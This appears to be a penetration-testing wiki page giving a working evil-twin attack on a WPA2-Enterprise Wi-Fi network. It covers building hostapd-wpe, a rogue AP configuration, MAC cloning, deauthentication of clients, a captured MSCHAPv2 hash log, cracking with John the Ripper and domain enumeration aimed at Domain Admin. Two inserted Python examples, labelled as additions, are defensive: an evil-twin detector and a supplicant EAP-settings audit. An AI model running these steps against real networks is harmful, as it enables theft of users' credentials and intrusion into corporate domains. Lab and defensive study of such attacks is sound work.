HOSTAPD-WPE


Last updated 1 year ago


Install the build dependencies:

```
apt-get install libssl-dev libnl-genl-3-dev libnl-3-dev pkg-config libsqlite3-dev build-essential wget --no-install-recommends
```

Download the files, apply the WPE patch and build:

```
wget https://raw.githubusercontent.com/aircrack-ng/aircrack-ng/master/patches/wpe/hostapd-wpe/hostapd-2.10-wpe.patch
wget https://w1.fi/releases/hostapd-2.10.tar.gz
tar -zxf hostapd-2.10.tar.gz
cd hostapd-2.10
patch -p1 < ../hostapd-2.10-wpe.patch
cd hostapd
make
make install
make wpe
```

Creating certs:

```
cd /etc/hostapd-wpe/certs
./bootstrap
make install
```

Write the AP configuration:

```
vim wpeattackap.conf
```

Contents (shown here with `cat wpe_custom.conf`). hostapd does not accept trailing comments on a line: they become part of the value, and `ssid=XX-AP  #name of the AP ...` would exceed the 32-byte SSID limit and be rejected, so every comment sits on its own line:

```
# ------------------------------
# common hostapd configuration
# ------------------------------
interface=wlan0mon
# name of the AP (even if it is hidden)
ssid=XX-AP
channel=4
hw_mode=g

# --------------------
# WPA configuration
# --------------------
# use WPA2
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP

# --------------------------
# EAP server configuration
# --------------------------
# require an 802.1X authentication server
ieee8021x=1
# EAPOL key index fix for the WinXP supplicant (disabled here)
eapol_key_index_workaround=0
# enable the integrated EAP server instead of an external RADIUS server
eap_server=1
# file containing the user database
#eap_user_file=fakenet.eap_user

# -------------------------------------------------
# certificate configuration for EAP-TLS/PEAP/TTLS
# -------------------------------------------------
#ca_cert=/root/certs/ca.pem
#server_cert=/root/certs/server.pem
# private key for the server certificate
#private_key=/root/certs/server.key
# password used to encrypt the private key (empty here)
#private_key_passwd=
# DH/DSA parameters file (PEM format)
#dh_file=/root/certs/dhparam.pem

eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/dh

# -----------------------------
# mana specific configuration
# -----------------------------
# enable WPE mode to intercept various EAP credentials
#mana_wpe=1
# return EAP success to the clients, and have them connect
#mana_eapsuccess=1
```

Use the same MAC as the target AP, start the AP and capture on its channel:

```
macchanger --mac xx:xx:xx:xx:xx:xx interface
sudo ./hostapd-wpe ~/wirelesspentestlabs/wpeattackap.conf
sudo airodump-ng --channel 4 wlp0s20f3 -w temp --essid-regex XX-AP
```

Deauth (with the MAC cloned, deauth is not necessary if the signal is strong \m/):

```
sudo aireplay-ng --deauth 50 -a 6c:8d:77:27:a1:25  --ignore-negative-one wlp0s20f3
```
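From the defender's side, the steps above leave a footprint: a second AP advertises the target ESSID (or, with the MAC cloned, the target BSSID itself) on a channel and cipher set that differ from the real AP. The following added example, which is not from the original page or from hostapd-wpe, reads the AP table of an airodump-ng CSV (the `temp-01.csv` that the `-w temp` run above writes) and flags BSSIDs that advertise an inventoried ESSID without matching the inventory; the CSV rows, the inventory and the rogue BSSID AA:BB:CC:DD:EE:FF are constructed.

```python
import csv

# Constructed airodump-ng style CSV (not a real capture); column names follow the
# CSV that `airodump-ng -w <prefix>` writes. Row 1 is the real AP, row 2 an evil twin.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
6C:8D:77:27:A1:25, 2024-03-15 03:30:01, 2024-03-15 03:36:00, 11, 54, WPA2, CCMP, MGT, -48, 120, 0,   0.  0.  0.  0,  5, XX-AP,
AA:BB:CC:DD:EE:FF, 2024-03-15 03:35:10, 2024-03-15 03:36:00,  4, 54, WPA2, CCMP TKIP, MGT, -31,  40, 0,   0.  0.  0.  0,  5, XX-AP,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
"""

# Assumed inventory: the BSSIDs allowed to advertise each corporate ESSID, with
# the channel and pairwise cipher they are configured for.
AUTHORIZED = {"XX-AP": {"6C:8D:77:27:A1:25": {"channel": "11", "cipher": "CCMP"}}}

def parse_ap_rows(text):
    # Leading blank lines are skipped; the first blank line after the header
    # ends the AP table (the station table follows it and is not needed here).
    lines = []
    for line in text.splitlines():
        if line.strip():
            lines.append(line)
        elif lines:
            break
    reader = csv.reader(lines, skipinitialspace=True)
    header = [h.strip() for h in next(reader)]
    return [dict(zip(header, (f.strip() for f in row))) for row in reader]

def find_rogue_aps(rows, authorized=AUTHORIZED):
    # airodump-ng keys its table on BSSID, so a MAC clone does not get its own row:
    # it surfaces as a channel or cipher mismatch on the legitimate BSSID instead.
    findings = []
    for r in rows:
        essid, bssid = r["ESSID"], r["BSSID"].upper()
        if essid not in authorized:
            continue  # not one of our networks
        known = authorized[essid].get(bssid)
        if known is None:
            findings.append((bssid, essid, "unknown BSSID advertising our ESSID (evil twin)"))
            continue
        if r["channel"] != known["channel"]:
            findings.append((bssid, essid, f"channel {r['channel']} != inventory {known['channel']} (MAC clone?)"))
        if r["Cipher"] != known["cipher"]:
            findings.append((bssid, essid, f"cipher '{r['Cipher']}' != inventory '{known['cipher']}'"))
    return findings

if __name__ == "__main__":
    for finding in find_rogue_aps(parse_ap_rows(SAMPLE_CSV)):
        print(*finding)
```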

GOTCHA!

```
wlan0mon: STA b4:d5:bd:a0:92:27 IEEE 802.1X: Identity received from STA: 'XXXX\xxx.xxx'


mschapv2: Fri Mar 15 03:36:34 2024
         username:      xxx\xxx.xx
         challenge:     57:f6xx:c6:33:4b
         response:      9e:2a:87xxxxx:ef:b2:58:4a:3f:b3:fd:1d:03:08
         jtr NETNTLM:           xx\xx.leao:$NETNTLM$57f6xc6334b$9exxxxxxx84a3fb3fd1d0308
         hashcat NETNTLM:       xx\xx.leao::::9e2a8702xxf6bbxxxx3fb3fd1d0308:57f6xxxc6334b
wlan0mon: STA 5c:fb:3a:2f:00:2f IEEE 802.11: authenticated
wlan0mon: STA b4:d5:bd:a0:92:27 IEEE 802.11: authenticated
wlan0mon: STA b4:d5:bd:a0:92:27 IEEE 802.11: associated (aid 3)
```
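The supplicant hands over that MSCHAPv2 challenge/response only because it accepted the rogue AP's bootstrap-generated server certificate and then sent its real username in the outer Identity. The added example below, which is not part of the original page, parses wpa_supplicant network blocks and audits the EAP settings that make this possible, showing a weak profile beside a hardened one; the profile contents, the CA path and the RADIUS server name are assumptions.

```python
import re

# Constructed wpa_supplicant profiles (not from the page): the weak one trusts any server that
# terminates the PEAP tunnel, the hardened one pins the corporate CA and RADIUS name (assumed values).
WEAK_CONF = """
network={
    ssid="XX-AP"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="corp\\j.doe"
    password="hunter2"
    phase2="auth=MSCHAPV2"
}
"""
HARDENED_CONF = """
network={
    ssid="XX-AP"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="corp\\j.doe"
    anonymous_identity="anonymous@corp.example"
    password="hunter2"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_match="radius.corp.example"
    phase2="auth=MSCHAPV2"
}
"""

def parse_networks(conf):
    nets = []  # one dict per network={...} block; quotes stripped, '#' comments dropped
    for body in re.findall(r"network=\{(.*?)\n\}", conf, re.S):
        net = {}
        for line in body.splitlines():
            line = line.split("#", 1)[0].strip()
            if "=" in line:
                key, value = line.split("=", 1)
                net[key.strip()] = value.strip().strip('"')
        nets.append(net)
    return nets

def audit(net):
    issues = []  # settings that let a rogue AP harvest the inner MSCHAPv2 challenge/response
    if "WPA-EAP" not in net.get("key_mgmt", "") or net.get("eap") not in ("PEAP", "TTLS"):
        return issues  # only tunnelled EAP methods carry an inner MSCHAPv2 exchange
    if "ca_cert" not in net:
        issues.append("no ca_cert: server certificate unchecked, any AP can terminate the tunnel")
    if not any(k in net for k in ("domain_match", "domain_suffix_match", "altsubject_match")):
        issues.append("no domain/altsubject match: any certificate issued by the CA is accepted")
    if "anonymous_identity" not in net:
        issues.append("no anonymous_identity: real username sent in the cleartext outer Identity")
    return issues
```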

Cracking it!

```
john-the-ripper hash
```

Getting Domain Admin From WiFi Scratch Approach \o/

As the SSID is hidden, the "hidden" network has to be created by hand in the client's network profiles before connecting to it.

```
cat /etc/resolv.conf
nameserver 127.0.0.53
options edns0 trust-ad
search xxx.local

ptavares@kali:~$ host xxxx.local
xxx.local has address 10.1.11.36
xxxx.local has address 10.0.4.1
xxxx.local has address 10.1.0.1
```

BloodHound or other tools can be executed now:

```
crackmapexec smb DC01 -u -p --users
```

Reference

hostapd-wpe
Wireless pentest lab Part 3